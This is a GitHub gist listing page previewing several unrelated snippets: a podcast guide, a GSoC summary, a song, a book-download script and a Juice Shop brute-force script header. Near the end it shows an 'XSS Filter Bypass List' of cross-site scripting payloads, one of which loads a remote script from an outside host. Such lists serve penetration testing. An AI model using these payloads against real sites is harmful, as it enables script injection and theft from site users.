Skip to content

Instantly share code, notes, and snippets.

View bkimminich's full-sized avatar

Björn Kimminich bkimminich

1.1k followers · 215 following
View GitHub Profile
@philly-vanilly
philly-vanilly / juice-shop-mortys-question-brute-force.py
Last active April 23, 2023 03:37
#!/usr/local/bin/python3.7
import itertools
import random
import ipaddress
import time
import aiohttp
import asyncio
base_url = 'http://localhost:3000'
@Aashish683
Aashish683 / GSoC-2018.md
Last active March 27, 2019 11:46
Summary of the work which I did during Google Summer of Code 2018 with OWASP.

This gist describes the work which was done in the Frontend Technology Update project the summer for the OWASP Juice Shop Project under Google Summer of Code 2018. The work for the project done is in the gsoc-frontend branch of the Juice shop repository while the work done for the Challenge Pack project by @CaptainFreak is in the gsoc-challenges branch. Both the branches were rebased to a third branch gsoc-integration which would contain the combined progress overall by both projects.

The project was split into three phases:

  1. Components and services were created in Angular that would replace the controllers and services in AngularJS. Unit tests
@7MinSec
7MinSec / CryptoLockerd.md
Last active November 15, 2018 18:48
This is an infosec-themed song called CryptoLocker'd

You can listen to this song on episode #276 of the 7 Minute Security podcast

Verse 1

You said you wouldn't do it
You said you wouldn't click that link
But you totally did
It’s clear you didn’t stop and think
How the promise of a free burrito would be all that it took
To open up our networks to virtual crooks

@7MinSec
7MinSec / 7MS_episode_guide.md
Last active January 4, 2024 18:38
7 Minute Security podcast episode guide

7 Minute Security podcast - full episode guide

Below is a blurb on each podcast episode, as well as a link to the corresponding show notes (if available). I apologize but this gist is often a little outdated, so to view the show notes for the latest episodes be sure to also check out 7ms.us.

7MS #586: DIY Pentest Dropbox Tips – Part 8

Today, sadly, might be the last episode of DIY pentest dropbox tips for a while because I found (well, ChatGPT did actually) the missing link to 100% automate a Kali Linux install! Check episode #449 for more info on building your Kali preseed file, but essentially the last line in my file runs a kali.sh script to download/install all the pentest tools I want.

View this episode's show notes for more information

@barrywoolgar
barrywoolgar / hb_all_books_dl.js
Created September 2, 2016 11:06 — forked from graymouser/hb_all_books_dl.js
Humble bundle book bundles - download all books at once
/*
After purchasing a humble book bundle, go to your download page for that bundle.
Open a console window for the page and paste in the below javascript.
This will download all the books in all the formats available.
*/
$('a').each(function(i){
if (['MOBI', 'PDF', 'EPUB'].indexOf($.trim($(this).text())) >= 0) {
$('body').append('<iframe id="dl_iframe_'+i+'" style="display:none;">');
document.getElementById('dl_iframe_'+i).src = $(this).data('web');
}
@garybernhardt
garybernhardt / types.markdown
Last active September 8, 2023 21:02

This document has moved!

It's now here, in The Programmer's Compendium. The content is the same as before, but being part of the compendium means that it's actively maintained.

@marcaube
marcaube / harlem-shake.js
Created April 8, 2016 18:04
Harlem Shake, a script to make those XSS dance
// Source: http://pastebin.com/aJna4paJ
javascript:(function(){function c(){var e=document.createElement("link");e.setAttribute("type","text/css");e.setAttribute("rel","stylesheet");e.setAttribute("href",f);e.setAttribute("class",l);document.body.appendChild(e)}function h(){var e=document.getElementsByClassName(l);for(var t=0;t<e.length;t++){document.body.removeChild(e[t])}}function p(){var e=document.createElement("div");e.setAttribute("class",a);document.body.appendChild(e);setTimeout(function(){document.body.removeChild(e)},100)}function d(e){return{height:e.offsetHeight,width:e.offsetWidth}}function v(i){var s=d(i);return s.height>e&&s.height<n&&s.width>t&&s.width<r}function m(e){var t=e;var n=0;while(!!t){n+=t.offsetTop;t=t.offsetParent}return n}function g(){var e=document.documentElement;if(!!window.innerWidth){return window.innerHeight}else if(e&&!isNaN(e.clientHeight)){return e.clientHeight}return 0}function y(){if(window.pageYOffset){return window.pageYOffset}return Math.max(document.documentElement.
@denilsonsa
denilsonsa / README.md
Last active May 1, 2024 11:41
Embed VTT subtitles into HTML

Embed VTT subtitles into HTML

Objective

I have a video file on my local disk. I also have some subtitles (in HTML5's [WebVTT][] format).

I want to create an HTML file to play that video with subtitles, all from the local filesystem.

Problem

@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active May 9, 2024 06:17
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@staltz
staltz / introrx.md
Last active May 9, 2024 07:59
The introduction to Reactive Programming you've been missing